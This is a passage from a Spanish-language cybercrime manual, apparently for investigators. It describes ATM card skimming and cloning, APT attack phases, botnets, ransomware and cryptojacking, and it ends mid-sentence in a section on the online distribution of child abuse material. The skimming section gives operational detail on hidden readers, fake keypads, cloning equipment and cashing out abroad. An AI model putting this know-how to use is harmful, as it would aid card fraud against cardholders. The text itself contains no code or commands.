Existen diversas técnicas para lograr

apoderarse de la información de las La parte esencial y sobre la que gira el
tarjetas, si bien podemos distinguir dos diseño es la boca o ranura por la que se
principales. En la primera es necesario introducen las tarjetas. Se trata de una
instalar físicamente sistemas que pieza construida con materiales plásticos
permitan copiar la información, mientras con idéntico diseño a la original, si bien un
que la segunda requiere la participación poco más grande a fin de encajar sobre la
de alguna persona, como puede ser el auténtica. De esta manera, consigue pasar
caso de empleados desleales. totalmente desapercibida a los clientes.
1. INSTALACIÓN FÍSICA DE SISTEMAS

LECTORES.
Consiste en la instalación en cajeros

automáticos de dispositivos físicos que,
simulando formar parte de la estructura
original del cajero, tienen como fin copiar la
información almacenada en las bandas
magnéticas y el número PIN de las tarjetas
Ilustración 27. Falsa boca instalada.
que se utilicen.
En la falsa boca se instala una cabeza

Estas actividades se realizan por lectora para que, cuando la banda

magnética pase por ella, grabe la información que contienen sus pistas. Al situar el falso
dispositivo lector inmediatamente antes del auténtico, permite que, una vez copiados los
datos, se produzca una auténtica lectura por el sistema electrónico del cajero, lo que
permite al cliente continuar normalmente con la operación solicitada. Esta característica,
la de no interferir en el uso normal de la tarjeta, incluida la extracción de dinero si fuera el
caso, tiene como objetivo que la manipulación no sea detectada, propiciando que más
tarjetas sean copiadas.
Para lograr un encaje perfecto de las falsas bocas lectoras, en ocasiones necesitan
instalarlas junto con los embellecedores y paneles que las rodean, por lo que el proceso de
construcción es mucho más elaborado y costoso, si bien necesario para poder instalarlo
con éxito sin llamar la atención.
La información que recoge el lector puede ser almacenada en algún dispositivo de

memoria instalado en la falsa boca (como pueden ser memorias tipo RAM o USB). Esta
opción está en desuso por los problemas de seguridad que presenta para los delincuentes,
ya que tener que ir periódicamente a sustituir el dispositivo de memoria amplía las
posibilidades de ser descubiertos. Los dispositivos actuales cuentan con funcionalidades
que permiten el envío de la información de manera automatizada e inalámbrica, a
través de Bluetooth, SMS, GSM, etc. La necesaria alimentación del dispositivo se salva a
través de pequeñas baterías que se instalan conjuntamente.
Junto con la información de las bandas magnéticas, los delincuentes necesitan conocer
el número PIN de las tarjetas que copien, ya que sin esta información no podrían utilizar
las tarjetas en comercios ni retirar efectivo en cajeros. Para lograrlo pueden optar por, al
menos, dos vías.
La primera es la instalación de una minicámara que, situada estratégicamente, capture

imágenes del teclado numérico mientras el cliente pulsa su número de identificación.
Dependiendo de la calidad de la cámara y de la situación concreta del cajero y de su

teclado, se deben de situar a una distancia más o menos cercana al teclado y con visión
directa, evitando ser interferida por cualquier elemento que acompañe al usuario o que
se encuentre instalado en el frontal del cajero. Se suelen disimular como parte de falsos
embellecedores diseñados y creados, al igual que las falsas bocas lectoras, especialmente
para cada tipo de cajero automático o utilizando elementos desmontables con los que
cuente el cajero, como pueden ser soportes para sobres o publicitarios.
Ilustración 28. Detalle de un falso embellecedor, donde se puede observar el orificio creado para situar tras él
la óptica de la cámara de vídeo.

Ilustración 29.Cámara unida a un módulo de transmisión inalámbrica y a las pilas para su
funcionamiento.
La segunda vía para conseguir el número PIN consiste en la instalación de un falso

teclado sobre el original. Si bien el grosor de este dispositivo es mínimo, en su parte interior
cuenta con un sistema electrónico que permite almacenar la secuencia numérica que el
usuario de la tarjeta marca para poder operar. Al mismo tiempo, los números pulsados
son interpretados correctamente por el teclado original, permitiendo el acceso a las
opciones del cajero automático sin producir error alguno ni detectarse la manipulación
del teclado.
Ilustración 30. Teclado falso para cajero automático

Igual que ocurría con la información obtenida a través de la grabación de las pistas
de la tarjeta, los números PIN pueden ser transmitidos de forma inalámbrica hasta
equipos informáticos situados en las inmediaciones del cajero que son manejados por
los delincuentes.
Estas técnicas de lectura, almacenamiento y trasmisión de los datos almacenados en
las bandas magnéticas de las tarjetas bancarias, así como de los números PIN asociados
a ellas, también son instalados en otros tipos de dispositivos en los que se pueden utilizar
las tarjetas bancarias. Es el caso de estaciones de servicio donde existen surtidores que
permiten el pago con tarjeta, peajes e incluso lectores TPV (terminal punto de venta, los
dispositivos con los que cuentan los comercios para facilitar el pago de sus clientes con
tarjetas bancarias).
Para evitar la utilización de técnicas de skimming, los diseños de cajeros automáticos y

otros tipos de dispositivos progresivamente incluyen elementos pensados para impedirlo.
En la siguiente imagen se puede apreciar el sistema ideado para proteger las máquinas
expendedoras de billetes de tren en Holanda.
Ilustración 31. Sistema antiskimming en una máquina expendedora de billetes
2. PARTICIPACIÓN DE EMPLEADO CONFABULADO
Para esta modalidad se ha de contar con la ayuda de algún empleado desleal de un

establecimiento comercial o con la participación de otra persona que tenga acceso
físico a las tarjetas bancarias de terceros por un período breve de tiempo.

Esencialmente, consiste en aprovechar que un cliente entrega su tarjeta bancaria con
el objeto de abonar una compra o servicio para, discretamente, copiar la información de
la banda magnética mediante un dispositivo lector portable (se trata de dispositivos
de tamaño mínimo que pueden ser ocultados de manera discreta). Dicho dispositivo
dispone de una memoria interna que permite almacenar un número considerable de
tarjetas. La información se extrae periódicamente mediante un programa informático.
En algunos casos se combinan las dos técnicas citadas, por ejemplo, cuando se utiliza
un grabador de tarjetas disimulado a la vez que se obtiene el número PIN asociado con
la intervención de una persona que de manera discreta observa el teclado y anota la
combinación numérica.
3. DISTRIBUCIÓN DE LA INFORMACIÓN
Ya con la información útil para sus propósitos, los delincuentes tienen que disponer de
capacidad y conocimiento técnico suficiente, además del material específicamente
destinado para clonar las tarjetas. Pueden desarrollar estas actividades los mismos
integrantes de la organización delictiva que han sustraído la información, otros
delincuentes especializados en esta fase o incluso terceros a los que venden la
información sustraída a través de distintas vías, como anuncios en páginas webs o foros
dedicados específicamente a este mercado, donde se suele emplear el término dump
para referirse a los datos de las tarjetas bancarias. Los precios se fijan en relación con el
tipo de tarjeta (classic, gold, platinium, infinte, etc.) y el país o zona geográfica de origen.
En los anuncios de este mercado, junto con el precio de los lotes de numeraciones de
tarjetas que se ofrecen y las condiciones en las que se produce su envío, se expone
la forma en que se puede contactar con el vendedor, que desde hace años suele ser
mediante ICQ (un sistema de mensajería instantánea).
Ilustración 32. Anuncios de venta de datos de tarjetas bancarias

Hoy en día, es la darknet, sin duda alguna, el principal mercado negro en cuanto a la
compra y venta de todo tipo de material ilícito, y las tarjetas de crédito obtenidas por
métodos fraudulentos no iban a ser menos. En la siguiente figura se muestra un anuncio
de venta de distintas tarjetas de crédito, sin PIN, con PIN y con PIN y garantía de saldo en
las mismas, para tarjetas de Estados Unidos, Europa, Asia, etc.
Ilustración 33. Tabla de precios según características y localización de la tarjeta robada
Para efectuar la clonación física, es decir, para crear tarjetas bancarias con la información
que han robado, la organización debe disponer de diversas herramientas o, en su caso,
encargar este servicio a otro grupo criminal que disponga de ellas.
Necesitan, en primer término, los soportes de tarjetas en blanco con bandas magnéticas
en las que grabar los datos sustraídos. Además, es necesario contar con una impresora
de alta calidad y de características especiales que permita imprimir sobre las tarjetas el
diseño de las originales, con igual intensidad y variedad de colores.
En las tarjetas falsas se deben incluir los hologramas o logotipos con los que cuenta cada
tipo concreto de tarjeta y que están pensados precisamente para evitar ser copiadas.
Estos hologramas se pueden comprar sin dificultad a través de distintas páginas web.
Con el soporte prácticamente acabado, deben codificar las pistas de la banda magnética.
Para esto se utiliza software diseñado para la codificación de la información y un lector/
grabador de bandas magnéticas a través del cual se efectuará la grabación.

Ilustración 34. Anuncio de holograma para clonar tarjetas bancarias
Por último, se debe hacer coincidir la información grabada en la banda magnética con
la que aparecerá en relieve en el exterior de la tarjeta. Se utilizan para ello máquinas
troqueladoras, conocidas como manual card embosser.
Ilustración 35. Manual card embosser
4. REALIZACIÓN DE OPERACIONES CON LAS TARJETAS
En disposición de las tarjetas clonadas, únicamente queda efectuar compras con ellas
o retirar dinero a través de cajeros automáticos. Para el primer caso, cada tarjeta se
acompaña de un documento de identidad en donde consta, junto a la fotografía de
la persona que la usa, datos identificativos coincidentes con los que se ha introducido

dentro de la banda magnética y que hacen referencia a su titular, lo que facilita efectuar
las compras y salvar las medidas más simples de comprobación de legitimidad de la
tarjeta.
Generalmente, no utilizan los datos de las tarjetas robadas en el mismo país donde las
obtienen con el objeto de retrasar al máximo el momento en que su titular denuncia
su utilización ilegítima. Estos grupos criminales están tan bien organizados y actúan con
tanta coordinación que se han detectado casos en los que se realizaban compras con
una tarjeta clonada en un país extranjero apenas unas pocas horas después de haberse
copiado su banda magnética en un cajero situado en España.
La franja de tiempo durante la que pueden utilizar la tarjeta clonada depende de algunos
factores como la cantidad de dinero que tenga fijada como límite, el tiempo que tarde el
titular de la tarjeta en darse cuenta de su uso ilegítimo, los sistemas antifraude que tenga
implementados la entidad financiera que haya expedido la tarjeta o el país en el que se
haya utilizado la tarjeta clonada.
Sin duda, el elemento que más dificultad está suponiendo para la consecución de los
objetivos de las redes de skimmers es la implantación de modelo de tarjeta conocido
como EMV (Europay, Mastercard y VISA). Se trata de un estándar implantado en todas
las tarjetas electrónicas de los países que lo han adoptado y cuya característica visual
externa es la inclusión de un circuito integrado (chip), que puede soportar procesos
criptográficos, por lo que la información relacionada con las operaciones es transmitida
cifrada y no puede ser interceptada.
Ilustración 36.Chip de las tarjetas con estándar EMV
2.4. Daños informáticos
De todos los delitos descritos, los incluidos en este punto son los que se pueden
considerar como más puramente informáticos. Se trata de ataques contra los principios
de confidencialidad (accesos no autorizados a los ficheros alojados en un sistema),

integridad (alteraciones en los ficheros alojados en un sistema) y disponibilidad (dejar
fuera de servicio a un sistema completo). Entre ellos, se encuentran los accesos ilícitos a
sistemas informáticos o partes de estos, la interceptación ilícita de las comunicaciones
de datos, los ataques contra la integridad —tanto de los datos como de los sistemas— y
los abusos de dispositivos.
Entre los identificados como daños informáticos se encuentran aquellas acciones que
tienen como consecuencia dañar, deteriorar, alterar, suprimir o hacer inaccesibles
datos. Junto a estas actividades, se recogen también bajo la denominación de daños
informáticos las acciones que tengan como resultado obstaculizar o interrumpir
el funcionamiento de un sistema informático ajeno (como puede ser el resultado de
ataques de denegación de servicio, DoS).
Existen innumerables vías de comisión de delitos relacionados con daños informáticos o

con el descubrimiento y revelación de secretos, por lo que resulta imposible exponerlas
todas aquí. Así pues, vamos a ver las características de alguna de las manifestaciones
delictivas más comunes y actuales, relacionadas con la difusión de malware, como son los
ataques conocidos como amenazas persistentes avanzadas, botnets y ransomware.
ADVANCED PERSISTENT THREAT (APT O AMENAZAS PERSISTENTES

AVANZADAS)
APT hace referencia al conjunto de medios empleados y técnicas utilizadas como parte de
un sofisticado ciberataque cuyo objetivo es la infiltración en un sistema o red informática
y su permanencia por un período prolongado de tiempo, durante el cual tendrá acceso
y extraerá constantemente información sensible o crítica de la empresa u organismo
víctima.
Como características descriptivas de una APT, se pueden incluir las siguientes:
• Amenazas dirigidas: se trata de amenazas específicamente enfocadas a

un objetivo determinado. Están planteadas y desarrolladas a medida de la
empresa u organismo concreto a cuya información se pretende acceder.
La víctima no es casual, como ocurre con la difusión de malware tradicional,
sino que es seleccionada por el atacante, por motivos claros y conforme a la
información concreta a la que quiera acceder.
• Amenazas avanzadas: se trata de sistemas de ataques complejos, muy
desarrollados y diseñados de forma exclusiva —incluido el software malicioso
que se usa en cada infiltración— para un objetivo concreto, por lo que se
adaptan a la perfección en el ecosistema al que atacan. Los responsables
cuentan con amplísimos recursos tecnológicos, humanos y económicos, junto
con ausencia de límite temporal para conseguir su objetivo. En el desarrollo
del ataque se suelen emplear de manera coordinada múltiples vectores de
ataque. Utilizan malware, se sirven de exploits que explotan vulnerabilidades no
publicadas, utilizan ingeniería social e incluso intervienen las comunicaciones
de las personas que consideran de interés para sus propósitos.

• Amenazas persistentes: si los sistemas de seguridad implementados por la
víctima impiden el éxito de un determinado ataque, el ciberdelincuente no
abandonará el objetivo, sino que buscará nuevas estrategias sobre las que
desarrollar modos de acceso alternativo. Una vez logrado el objetivo inicial
de colonizar un sistema o una red, se mantiene en él durante un período
de tiempo muy prolongado, ya que es muy difícil tanto su detección como
su eliminación total. Las APT están en constante mutación, adaptándose
continuamente a las características del sistema que ataca. Esta versatilidad
hace que su detección sea muy compleja a través de los métodos tradicionales
de detección de intrusiones.
De manera progresiva, la conciencia colectiva sobre la existencia de estos tipos de

ataques complejos ha pasado de un inicial escepticismo a ser considerados como
peligrosos únicamente para empresas relacionadas con las infraestructuras críticas.
Finalmente, se ha adquirido conciencia sobre el peligro real que suponen las APT para
cualquier corporación, con independencia de su tamaño o la actividad concreta que
desarrolle. Actualmente, la detección de APT se ha convertido en una de las principales
prioridades para los servicios de seguridad de cualquier empresa, tanto privada como
pública.
Generalmente, la finalidad de un ataque bajo la estructura de una APT se centra en obtener
información relacionada con programas de desarrollo industrial o de investigación. Es
decir, información estratégica relevante con la que el atacante —o su potencial cliente—
adquieren importantes ventajas competitivas. Los enormes beneficios que se esperan
obtener del ciberespionaje compensan la inversión en recursos que son necesarios para
el estudio, desarrollo, mantenimiento y explotación de una campaña de APT.
En el informe The advanced persisten threat, elaborado por la compañía de seguridad
norteamericana Mandiant, se identifican siete fases que según esta empresa se siguen
en un ataque APT. Si bien no todos los procesos de intrusión coinciden con el ciclo descrito
por Mandiant, la estructura presentada sirve para entender el funcionamiento general de
este tipo de amenazas.
FASE 1. RECONOCIMIENTO
Como primera fase, los atacantes recopilan toda la información pública y confidencial
que puedan obtener sobre la empresa víctima. Para esto utilizan desde las webs de la
compañía hasta los artículos publicados relacionados tanto con su actividad como con
la de sus directivos. Además, estudian a otras empresas que mantengan relación con
su objetivo, a la búsqueda de puntos de acceso o fuentes de información. Seleccionan
como objetivos a aquellas personas de las que se pueden servir para lograr el primer
acceso a la red interna de la compañía. Suele tratarse de directivos con alto nivel de
responsabilidad o de desarrolladores o investigadores líderes de proyectos.
Una vez identificados los objetivos, despliegan sobre ellos todas las herramientas
que disponen para conocer sus hábitos, rutinas y vida en general (resulta esencial la
información que el objetivo tenga en las redes sociales en las que participe). Buscan la
mejor oportunidad para infectar sus equipos informáticos y acceder a través de ellos a la
red informática corporativa.

FASE 2. INTRUSIÓN INICIAL EN LA RED
Para lograr la infección inicial que les permita entrar en la red, suelen servirse de distintas
técnicas. Las que mayor índice de éxitos les ofrece y, por lo tanto, las más utilizadas se
basan en la ingeniería social sustentada en el envío de correos electrónicos dirigidos a
las personas concretas (se conoce como spear phishing), donde se incluyen enlaces a
páginas web o ficheros adjuntos con algún tipo de malware o exploit que aprovecha
alguna vulnerabilidad y compromete algún servidor no principal.
FASE 3. ESTABLECER UN BACKDOOR EN LA RED

El objetivo perseguido en esta fase es la obtención de las credenciales del administrador
del dominio, con las que instalar distintas puertas traseras en el sistema y garantizar
de esta manera la actualización permanente del malware, así como su presencia en
la red aun en el caso de ser detectado y neutralizada la infección inicial. La constante
actualización tiene como finalidad no ser detectado en los análisis de intrusiones que se
realizan con base en el reconocimiento de firmas incluidas como malware.
Una vez que el malware se ha instalado en el sistema víctima, se pone en contacto con
su sistema de mando y control (C&C) mediante una conexión en la que comunica el éxito
de su infección, su disponibilidad y operatividad. Con el fin de no ser detectado, realiza
las conexiones de manera cifrada y utilizando técnicas de ofuscación que impidan su
detección, con las herramientas habituales de análisis de tráfico de red.
FASE 4. OBTENCIÓN DE CREDENCIALES DE USUARIO

Como siguiente objetivo se encuentra la obtención de las credenciales necesarias para
iniciar sesiones dentro del sistema, bajo la identidad de usuarios legítimos. La práctica
habitual es conseguir, en primer lugar, las instaladas en los distintos equipos individuales
para, posteriormente, comprometer los controladores de dominio y las credenciales de
los administradores del sistema.
FASE 5. EXPLORAR E INSTALAR UTILIDADES

Los autores del ataque, dentro del sistema comprometido, ejecutan herramientas
informáticas (como sniffers, decrypters o key registers) que les permiten ejercer un control
total sobre los equipos. Con ellas pueden instalar nuevos backdoors y malware, robar
credenciales de usuarios, obtener correos electrónicos de los servidores, conocer qué
programas se encuentran funcionando en un momento concreto, tomar el control de los
procesos, modificar archivos, así como un larguísimo etcétera de posibilidades.
Este software se instala utilizando credenciales válidas en la red, lo que le garantiza una
persistencia en el sistema al tratarse de una instalación efectuada por un usuario legítimo,
con alto grado de privilegios en el sistema.
FASE 6. ESCALADA DE PRIVILEGIOS, MOVIMIENTO LATERAL Y EXTRACCIÓN DE
DATOS
Tras la infección inicial, se van colonizando todos los equipos de la red en la que se
encuentre a la vez que se escalan privilegios con los que acceder a los servidores de
mayor jerarquía. Así se alcanza el control sobre los sistemas estratégicos.

En este proceso, identifica la información que en cada dispositivo pueda ser de interés y la
envía —comprimida y cifrada— a un servidor que pertenezca a la red creada y controlada
por los atacantes.
FASE 7. MANTENER PERSISTENCIA

Los atacantes son conscientes de los esfuerzos que sus víctimas efectúan para detectar
y evitar cualquier tipo de acceso a sus sistemas. Para permanecer ocultos y no ser
detectados ni por los antivirus ni por los sistemas de identificación de intrusiones, realizarán
distintas acciones que les facilitará la permanente mutación de su malware, así como la
instalación de nuevos accesos remotos y la infección de equipos complementarios.
Las fases descritas son cíclicas, se suceden unas a otras, y permanecen siempre activos
los procesos que las componen. De esto depende la persistencia del ataque, con una
escalada constante de privilegios en la red y con la continua adquisición de información
actualizada. No se trata de entrar y robar la información que se considere de interés
en un momento concreto, sino de acceder a ella en el momento en que se produzca
por sus propietarios, manteniendo constantemente las ventajas económicas, políticas o
estratégicas que el APT les facilita.
BOTNET
El término botnet hace referencia a una red de computadoras (a los equipos que forman
parte de una red botnet se les suele llamar robots, bots o zombis) que, estando infectados
por un malware, son controlados de manera coordinada y remota por una persona
responsable de su mantenimiento y utilización, identificada con el término
Este control sobre los equipos informáticos puede ser utilizado para usarlo de manera
coordinada o distribuida en determinadas acciones ilícitas, sin que los usuarios de
los equipos infectados participen en ellas o tengan conocimiento de su realización o
consecuencias. El número de equipos que pueden llegar a formar parte de una botnet
es prácticamente ilimitado; se han detectado y desarticulado redes con millones de
equipos infectados.
Las etapas que, de una manera aproximada, siguen los ciberdelincuentes para la creación
de una red de botnets son las siguientes:
• En primer lugar, diseñan qué tipo de red quieren establecer, con qué finalidad
y potencialidad y qué medios técnicos —como es el caso del sistema de
control— van a necesitar. El sistema de control denominado mando y control
(Command & Control o C&C) es un programa que, con una sencilla interfaz,
permite la gestión remota de la red, lo que facilita distintas acciones como la
grabación de las pulsaciones de los teclados mediante la implementación
de un keylogger, la creación de cuentas de administrador con las que escalar
privilegios dentro de cada máquina, la ejecución remota de comandos, la
captura de pantalla, la descarga y transferencia de ficheros, etc.
• Posteriormente, deciden el malware concreto que van a utilizar para establecer
la conexión con los equipos informáticos víctimas. A través del malware
elegido podrán tomar su control. Este software malicioso, dependiendo de la
cualificación técnica del delincuente, puede diseñarlo y programarlo él mismo
o comprarlo en el mercado del cibercrimen a otros creadores de malware.

Estos no solo pueden facilitar el programa, sino que, además, prestan todo
tipo de servicios posventa como ayuda en su configuración, determinación
de parámetros para utilizar en un ataque concreto, elección de objetivos
e incluso apoyo para trasformar en dinero los datos que obtengan con su
utilización.
• Finalmente, la distribución de estos programas se puede realizar por distintos
medios. Así, pueden ser enviados incrustados en cualquier tipo de archivo —
PDF, Word, Excel, etc.— que se remita en correos electrónicos o en mensajes
enviados a través de redes sociales. El mensaje de correo electrónico puede
ser enviado como parte de una campaña indiscriminada de spam o bajo el
soporte de un ataque basado en ingeniería social. Otra forma de distribuirlos
es con la inclusión de código malicioso dentro de una web o de un vídeo, de
manera que con solo visitarla o visionarlo el equipo informático se infecte con
el malware.
El objetivo último es que se infecte el mayor número de equipos para que formen parte
de la red de bots. Para esto, los programas maliciosos suelen contar con funcionalidades
que les permiten propagarse automáticamente sin la participación de sus controladores,
por lo que, una vez instalados dentro de una red, la recorren en busca de nuevos sistemas
huéspedes donde instalarse y añadirse a la red de equipos controlados.
Cada equipo que es colonizado por la botnet ha de comunicarse con su botmaster a
través de su servidor de mando y control (C&C), tanto para hacerle saber que se encuentra
activo como para recibir las actualizaciones e instrucciones por ejecutar. Para ello existen
varias vías, entre las que podemos citar:
• La instalación de una puerta trasera o backdoor, por la que su controlador
puede acceder al sistema infectado.
• Mediante conexiones web HTTP. Actualmente es la más utilizada, ya que
estas conexiones pasan desapercibidas a los sistemas de seguridad como
cortafuegos. Además, otra ventaja que aporta este tipo de comunicaciones es
que pueden ser fácilmente cifradas, lo que evita su detección e interpretación.
• Se han detectado también conexiones al servidor de mando y control de una
botnet con los equipos infectados mediante la utilización de Twitter. En este
caso, las órdenes eran enviadas mediante la publicación de mensajes en tuits.
Cuando la botnet cuente con un número suficiente de equipos comprometidos, estos

pueden ser utilizados para conseguir el objetivo que se hubiera marcado con la creación
de la red. Así, podrá tratarse de alguna o algunas de las siguientes actividades:
• Utilizar la red para el envío masivo de mensajes spam o de campañas de

phishing.
• Realizar ataques de denegación de servicios distribuidos (DDoS).
• Utilizarla para la distribución de nuevo malware.
• Robar la información de los usuarios de los equipos infectados.
• Utilizar los equipos comprometidos como repositorios desde donde distribuir
material ilícito, como pueden ser imágenes, malware, contenido vulnerador
de propiedad intelectual, etc.
• Utilizar los equipos como servidores donde alojar webs utilizadas como
phishing o desde las que dar soporte a otros fraudes.

• Servirse de la red para que visiten determinadas páginas web, donde el
número de accesos se traduce en beneficios económicos para sus gestores
por publicidad.
• Todas estas posibilidades y otras para las que pueda servir la botnet pueden
ser explotadas directamente para beneficio de su creador o alquiladas a
terceros que pagarán por ello un importe económico que dependerá del
tiempo o capacidad en su utilización.
Las botnet no son exclusividad de las computadoras personales. En la actualidad, existe
malware diseñado específicamente para infectar smartphones.
RANSOMWARE
El tipo concreto de malware conocido como ransomware (término que proviene de la
palabra inglesa ransom, cuyo significado es ‘rescate’) hace referencia a una variante
específica de software malicioso que bloquea el acceso al sistema informático o a
determinados archivos, a fin de exigir una cantidad de dinero a modo de rescate para
devolver su control al usuario. Los primeros casos se dieron en Rusia en los años 2005
y 2006. Desde entonces, el malware ha ido evolucionando, tanto en la manera de su
distribución como en las tácticas que se emplean para conseguir sus objetivos.
Esta modalidad de daños informáticos se ha convertido en una de las que mayor
tasa de distribución ha alcanzado, si bien su incidencia real no es conocida debido al
considerable número de víctimas que, por un motivo u otro, optan por no denunciarlo. No
obstante, por la información que aparece sobre él en medios de comunicación y sobre
todo en webs especializadas, parece que este tipo de delito continuará incrementando
su actividad a pesar de los éxitos policiales puntuales, debido principalmente a la sencillez
de su comisión, a la potencial aparición en el mercado de exploit kits y a la ausencia
de intermediarios que lleva consigo una mayor agilidad y reducción de riesgos para los
delincuentes.
Un exploit kit es un conjunto de funcionalidades empaquetadas que contienen programas
informáticos destinados a ejecutar y explotar ataques de manera automatizada. Estos
paquetes se encuentran a la venta en los mercados del cibercrimen, por lo que cualquiera
que los obtenga puede ejecutar ataques con independencia de su cualificación técnica.
Esta modalidad delictiva supone un peligro creciente tanto para usuarios domésticos
como para las empresas, ya que una pérdida de archivos con información sensible
puede tener consecuencias importantes, ya sean de índole productivo, de gestión o
competitivas.
ORIGEN Y EVOLUCIÓN
Las primeras actividades criminales que se conocen relacionadas con el secuestro
de datos informáticos se basaban en la distribución de un malware que cifraba
archivos, carpetas o dispositivos de almacenamiento del sistema informático atacado.
Principalmente documentos con extensiones del paquete Office (.doc, .xls, .ppt, etc).

Ilustración 40. Mensaje dejado por malware sobre el cifrado de los archivos personales.
El malware situaba en el escritorio de la computadora infectada, a modo de tapiz, un

mensaje en el que informaba del cifrado de los archivos personales y que, para poder
recuperarlos, la víctima debía seguir los pasos que se indicaban en un fichero de texto
que había sido situado en el mismo escritorio. Como en todo secuestro que se precie, el
mensaje incluía una advertencia sobre las consecuencias que tendría informar a alguien
sobre lo ocurrido.
En otras variantes iniciales del malware aparecía una ventana emergente en el escritorio
de la computadora infectada, en las que se mostraba una imagen pornográfica junto
con un texto en el que se informaba que, como única vía para eliminarlo, se debía enviar
un SMS con coste económico.
No hace mucho, WannaCry (WanaCrypt0r 2.0) fue el protagonista de un ataque a escala
mundial que afectó a empresas como Telefónica, Iberdrola y Gas Natural, en España,
o al servicio de salud en el Reino Unido, que se estima que afectó al menos a 141 000
computadoras.
WannaCry usó la vulnerabilidad EternalBlue, desarrollada por la Agencia de Seguridad
Nacional estadounidense y filtrada por el grupo The Shadow Brokers, que permite atacar
computadores con el sistema operativo Microsoft Windows no actualizado debidamente.
Más actual es la importancia que está teniendo el cryptojacking (también denominado
minería de criptomonedas maliciosa), la amenaza más emergente de Internet que se
oculta en una computadora o en un dispositivo móvil. Utiliza los recursos de la máquina
para extraer diversas formas de monedas digitales conocidas como criptomonedas.
Permite realizar operaciones de minado en máquinas ajenas y tiene la capacidad de
apoderarse de navegadores web, así como de comprometer todo tipo de dispositivos,
desde computadoras de escritorio y portátiles hasta teléfonos inteligentes e incluso
servidores de red.
Un tipo de cryptolcker es cryptowebsite, que se trata de crear una página web con un
script de cryptojacking integrado. Simplemente se necesita una página web que la gente
quiera visitar y que contendrá un script que se ejecutará y permitirá realizar opciones de
minado en distintas criptomonedas (bitcoin, ethereum y ripple).
Tampoco es necesario un conocimiento exhaustivo de desarrollo de scripts; programas
como Cryptoloot tienen la capacidad de hacerlo siguiendo unas mínimas instrucciones,
incluso tiene moneda y wallet en la que recibir los pagos. La víctima no ve ningún indicio
en la web de que se están utilizando sus recursos para minar criptomonedas. En la figura
siguiente se muestra la interfaz que proporciona Cryptoloot.

Ilustración 41. Interfaz de Cryptoloot.
Toda propagación de malware tiene sus vectores de ataques, algunos sofisticados

como cryptolocker, otros más clásicos como phishing o ingeniería social. Clásicos, sí,
pero nunca fallan.
Se trata de distribuir el malware de forma masiva, para lo que se sirven de las técnicas
utilizadas con otros tipos de malware, como su difusión a través de páginas web con
contenidos atractivos y a veces no del todo legales (pornografía o relacionados con
descargas de contenidos multimedia), a través de documentos o ficheros adjuntos
a correos electrónicos, mediante programas de intercambio de archivos, de redes
sociales, etc.
Se trata de dar un aspecto de mayor autenticidad al mensaje y apariencia de ser una
acción legítima llevada a cabo por organismos de todo tipo, oficiales o no. Con ello
pretenden aumentar el número de víctimas. Los diseñadores de malware comenzaron a
incluir imágenes identificadoras de organizaciones internacionales o cuerpos policiales
conocidos mundialmente, como es el caso del FBI o de INTERPOL.
PAGO DEL RESCATE

Parte del éxito que este modus operandi supone a los ciberdelincuentes se basa en que,
para recibir los pagos, es decir, para cobrar las extorsiones, han huido de sistemas
tradicionales como las transferencias bancarias o el envío de dinero a través de mulas,
que se utilizan en otros delitos como el phishing. En este caso, están explotando las
posibilidades que facilitan los sistemas de pago directos, cuya característica y marca
diferenciadora frente a otros sistemas de pago tradicionales es que garantizan al
máximo el anonimato de sus transacciones y el de las personas que intervienen, lo que
facilita a los delincuentes su impunidad.
¿Cómo se realiza? Antes, los responsables del ransomware elegían servicios de compañías
como Ukash y Paysafecard, empresas que permitían realizar pagos de manera cómoda,
rápida y sobre todo anónima, ya que no se relacionaba el pago con ningún tipo de
dato bancario ni tarjeta de crédito o débito. Su mecánica consistía en que las víctimas
compraban un vale de estas empresas en el que aparecía un código que se debía hacer
constar como pago en el espacio web reservado para ello.
Hoy el método por excelencia es el cobro por criptomonedas. El ciberdelincuente envía la
dirección de su monedero, y en muchos casos un código QR donde va inmerso tanto la

dirección del monedero como la cuantía, y la víctima «tan solo» tiene que escanear ese
código desde su wallet (si es que lo tiene) y aceptar, por lo que se procede al intercambio
de criptomonedas de una forma irrastreable: no hay nada que relacione un monedero
con un usuario. En la siguiente figura se muestra un código QR de un wallet.
Ilustración 42.Ejemplo de código QR de un wallet.
DESINFECCIÓN
En las primeras variantes, aún activas, se logra eliminar el malware mediante el acceso
a la opción de modo seguro del sistema operativo, para luego realizar cambios a través
de Regedit. Las constantes mutaciones que está sufriendo hacen que con cada nueva
evolución sea más complicada su desinfección. Gracias a la publicidad que se está
realizando de la existencia de este malware, existen profesionales de la seguridad que
publican soluciones de manera constante y que se distribuyen por distintos foros y
páginas web, por lo que no resulta complicado encontrarlas y aplicarlas, si bien es cierto
que no es nada fácil y son muchas las ocasiones donde se puede recuperar una parte
de la información perdida.
No olvidemos que lo mejor es prevenir y tener realizados backups de nuestra información
de una forma continua y permanente. Otra prevención es la de concienciar a los usuarios
de los peligros de navegar por páginas de dudosa reputación o el riesgo de aceptar la
instalación de cualquier tipo de plugin para poder ejecutar algo.
EVOLUCIÓN
La constatación por parte de los delincuentes del éxito que este tipo de delito les
acarrea (traducido en beneficios económicos) hace fácilmente predecible que esta
modalidad de extorsión se hará cada vez más usual.
2.5. Difusión de contenidos ilícitos

En este apartado se engloban todos aquellos delitos que son lesivos para intereses
diversos, tales como injurias, incitación al odio o a la violencia, calumnias o amenazas
y en los que Internet y el resto de sistemas de comunicaciones actúan como elemento
facilitador que incrementa exponencialmente las posibilidades para su comisión y la
capacidad de ocultamiento de su autor, lo que multiplica los efectos lesivos que estos

delitos ocasionan en la víctima.
La distribución de contenidos relacionados con abusos a niños, niñas y adolescentes
(NNA, en adelante), si no son los más frecuentes, sí son los que causan mayor lesividad
y rechazo social.
CONTENIDOS RELACIONADOS CON MATERIAL DE ABUSO SEXUAL

A NIÑOS, NIÑAS Y ADOLESCENTES
A pesar de ser el tipo penal que con más interés y coordinación internacional se persigue y
el que cuenta con un número mayor de iniciativas jurídicas y de acuerdos internacionales,
aún no se ha logrado encontrar la manera de parar la difusión y, lo que es peor, detener
la producción de este tipo de contenidos, debido en gran medida a que es una actividad
criminal que mueve grandes cantidades de dinero a nivel internacional.
Entre las diversas vías por las cuales se procede actualmente a la difusión de este tipo de
contenidos ilícitos, se encuentran las siguientes:
• Páginas web a las que se accede sin ningún tipo de restricción a través de
los navegadores y que se encuentran indizadas por los buscadores.
• Páginas web indizadas en los buscadores, pero de acceso condicionado, por
lo que exige que sus usuarios formen parte la comunidad, en la que participan
enviando archivos o a la que contribuyen ingresando importes económicos.
• Páginas web no indexadas por los buscadores convencinales (deep web). Para
acceder a ellas hay que conocer previamente su dirección web y hacerlo a
